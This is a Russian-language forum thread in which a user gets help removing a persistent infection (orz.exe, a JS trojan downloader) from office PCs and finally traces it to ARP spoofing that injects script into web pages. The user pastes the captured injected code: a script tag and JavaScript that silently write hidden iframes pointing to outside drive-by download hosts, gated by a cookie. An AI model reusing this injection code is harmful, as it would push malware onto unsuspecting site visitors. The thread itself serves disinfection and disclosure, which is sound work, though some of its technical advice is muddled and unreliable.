Для восст Safe Mode AVZ - Файл - Восст системы - п.10
Временные файлы Инета почисти.
Найти через AVZ: C:\WINDOWS\AppPatch\Jview.dll, поместить в карантин и затем удалить.
Логи посмотрим, м.б. что-нибудь еще увидим.
Printable View
Для восст Safe Mode AVZ - Файл - Восст системы - п.10
Временные файлы Инета почисти.
Найти через AVZ: C:\WINDOWS\AppPatch\Jview.dll, поместить в карантин и затем удалить.
Логи посмотрим, м.б. что-нибудь еще увидим.
Через avz не ищется ... с логами не понял, ещё раз выложить или вы старые ещё посмотрите?
Да, новые, после всех последних удалений.
сделал, появилась новая ошибка, вываливается окно, скрин в приложении.
Вот эти два файла знаешь что это такое:
C:\Documents and Settings\MANAGER\Application Data\m\flec006.exe
C:\Program Files\KsCatalog\webtogo\wtgstart.bat
Если нет, то загрузить их в карантин и прислать нам на анализ.
По поводу ошибки: можно через AVZ сделать поиск в реестре по имени файла, что выдается на окошке и удалить ключики реестра, где он встретиться.
первый файл не известен, второй знаю ... сейчас попробую его выслать ...
и с ошибкой, спасибо за совет, сейчас попробую!!!!
C:\Documents and Settings\MANAGER\Application Data\m\flec006.exe - файл найти не удалось
и тот файл, что в скрине, который я вам прислал тоже обнаружить не получается, есть только похожее C:\WINDOWS\Prefetch\ORZ.EXE-3238823D.pf, удалял его - всё равно появляется - эта фигня уже достала, ничего скачать нельзя, как только с нета что-нибдуь хочешь вытащить - лезет!!! в реестре ссылок нет, удалить её можно, но следующий клик по любой ссыле её оживляет!
из вирусов постоянно беспокоит :http:root.51113.com/root.gif - Win32/TrojanDownloader.Murlo.NN trojan, как с ним бороться?
[size="1"][color="#666686"][B][I]Добавлено через 2 часа 0 минут[/I][/B][/color][/size]
Господа, помогите избавится от непонятного вируса, ничто его не детектит! при попытке что-нибудь скачать с нета вылетает ошибка, скриншот в посте повыше. При чём эта тварь как-будто бы быстро распространяется по сети!
[size="1"][color="#666686"][B][I]Добавлено через 2 часа 0 минут[/I][/B][/color][/size]
Кто-нибудь поможет, господа?
[size="1"][color="#666686"][B][I]Добавлено через 46 минут[/I][/B][/color][/size]
Нашёл,что вирус свежачёк
[url]http://www.prevx.com/filenames/X468714806485356630-X1484125085/ORZ.EXE.html[/url]
только никак не получается скачать програмулину, которая вроде бы как избавит от это ГАДА!!! если у кого нибудь есть в наличии сей продукт, сбросте на [email][email protected][/email] !?
[size="1"][color="#666686"][B][I]Добавлено через 2 часа 16 минут[/I][/B][/color][/size]
меня наверное скоро забанят?:)
не помогает данная прога, какая то она странная,больше похоже на то, что она ещё вирей напустит. каким образом можно вычислить как появляется файл orz.exe? я уж и хайджеком всё подчистил всё из автозагрузки снёс, а он уже и у соседей сидит этот вирь! ещё интересно то, что он вылетает только при работе с IE, если,например, запустить Firefox или Opera то работать можно, но только ничего не скачивается, когда хочешь что-нибудь скачать скорости нет совсем. прову звонил, да и сам мониторил, спам не идёт, канал нормальный, а ничего скачать нельзя!
[size="1"][color="#666686"][B][I]Добавлено через 1 минуту[/I][/B][/color][/size]
ЗЫ: не теряю надежды :)
[size="1"][color="#666686"][B][I]Добавлено через 15 минут[/I][/B][/color][/size]
вот собсно и сам зловред,его даже в блокноте посмотреть можно ...
Недавно этого root.gif гонял.
Попробуйте отключившись от интернета почистить все временные файлы и кеш браузера у всех пользователей. Даже для пользователей NetworkService, LocalService и System.
И после всего этого, не подключаясь к и-нету еще раз прогнать 3-й скрипт.
Пункт 2 правил выполнялся? Альман - файловый вирус. Или можете сделать полную проверку в [url=http://devbuilds.kaspersky-labs.com/devbuilds/AVPTool/]AVPTool[/url].
Пункт 2 выполнялся, с этой штукой "orz.exe" - ничего не помоглою Спасибо за совет по поводу root.gif, сейчас попробую снести! С альманом конечно трудно бороться, но его вроде бы победил, а вот что за таинственный зловред, который не даёт нормально работать с интернетом??? его даже идентифицировать трудно!
[size="1"][color="#666686"][B][I]Добавлено через 2 часа 26 минут[/I][/B][/color][/size]
и всё таки кто-нибудь встречался с этим гадом "orz.exe" ... есть подозрение, что это производная он вируса Trojan-Downloader.JS.Multi.cj, который каким то образом всё время проявляется файлом c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\0HAB4LQB\ads[1].js -определяется только семейством касперов!
[size="1"][color="#666686"][B][I]Добавлено через 32 минуты[/I][/B][/color][/size]
Вот грёбаный скрипт, который содержит файл orz.exe: собсно вот он и добавляет его в страничку, реагирует только експлоер, хотя работает скрипт во всех браузерах! как же его изничтожить??? похоже свежый уродец, ещё нет решения???
<script language="javascript" SRC="http://hk.www404.cn:53/ads.js"></script> <html><script>window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<iframe src=http://flash.w3cpublic.cn:8080/f/ilink.html width=100 height=0></iframe>");
}
else{document.write("<iframe src=http://flash.w3cpublic.cn:8080/f/flink.html width=100 height=0></iframe>");}
}
</script></html>
[size="1"][color="#666686"][B][I]Добавлено через 25 минут[/I][/B][/color][/size]
единственные два компа,которые не пострадали были БЕЗ АНТИВИРУСА)))))))))))))
[quote=Petro8i4;243678]
всё таки кто-нибудь встречался с этим гадом "orz.exe" ... есть подозрение, что это производная он вируса Trojan-Downloader.JS.Multi.cj, который каким то образом всё время проявляется файлом c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\0HAB4LQB\ads[1].js -определяется только семейством касперов[/quote]
А не в этом ли причина [CODE]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.daemon-search.com/default
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://dt-updates.com/activate?query=Xd4suOWfXEeqjdgZwfln5qaIBSihY7w%2fXRU6y8q0wThPLDjEaLP10wZA089n5wFomZhw4D7VOJx8%2b2KiDghHDotIpl5aEU8TCj9NL8UxTfjAxSm6VmB40aDuAtAOH3VnRVEly6t%2fyaycAIh%2bLqATLJ1YDgifSumDnqtWbwQvOIO7LDadj5P934fBiLuin5Xvw3cWYD2soOumxA3beDoerLHAyWsb8EdpAiaD6LYaJq87Iut1pZygBYht%2bDmL4KMJ8o%2bpglZ1gRRZAoEcx7skyEWZtqU%2bhCzPLmJo97hgF90%3d[/CODE]
Если эти адреса не Вами прописаны, пофиксите указаные строчки
Очень желательно поставить 3-й сервиспак.
ну первая известна, просто daemon tools ставил, она и прописалась, а вот вторая нет, попробую снести, а sp3 уже накатил, думал обновлю винду и всё пройдёт, даже ИЕ 8 поставил, проверил авп и крюит в безопасном режиме, снёс все темпы под корень, а вместе с ними и корзину и систем вольюм ... ничего не помогает(((
Господа, получилась очень интересная тема!
ответ нашёлся на одном буржуйском сайте, ссылку не дам, не сохранилась ... по гуглу нашёл!
Вобщим Multi.cj (создаёт в темпе файл orz.exe и прописывает на страничках такой код: <script language="javascript" SRC="http://hk.www404.cn:53/ads.js"></script>, каспер кстати пытается при любом обращении не пропускать его, но тщетно, только удаляет файл c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\0HAB4LQB\ads[1].js) используется для poofing (пуфинга) или ARM атак, как я понимаю это то, что называют "хорошо забытое старое"! Вобщем алгоритм выявления в сети ARM-вирусов,в частности именно этого, cmd, потом arm -a, и смотрим какой MAC адрес компа в сети совпадает с MACом шлюза, если такой есть - значит сеть заражена, отрубаем комп (компы) от сети и нафиг сносим всё что на них есть, хотя можно попробовать и полечить, но я после первой попытки отказался, просто на компе и так почти ничего не было! Есть второй способ определения: берём програмку ARProtect, устанавливаем, и она считает ARM атаки и показывает, что за гад это делает. Господа, вобщем надеюсь никому не придётся с этим столкнуться! У меня вся сеть трещала, при чём каждый антивирь находит свой вирус!! И ошибки чуть ли не на каждом компе разные!
Удачи в победах над вирусами!
Молодец, что не сдался. Твоя И-ция важна для лечения других, за нее отдельное СПС.
Я просто не мог сдаться ;) Выхода не было!
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]3[/B][*]Обработано файлов: [B]6[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] c:\\windows\\system32\\wintems.exe - [B]Email-Worm.Win32.Bagle.of[/B] (DrWEB: Win32.HLLM.Beagle)[*] \\orz.exe - [B]Trojan-Downloader.JS.Iframe.si[/B][/LIST][/LIST]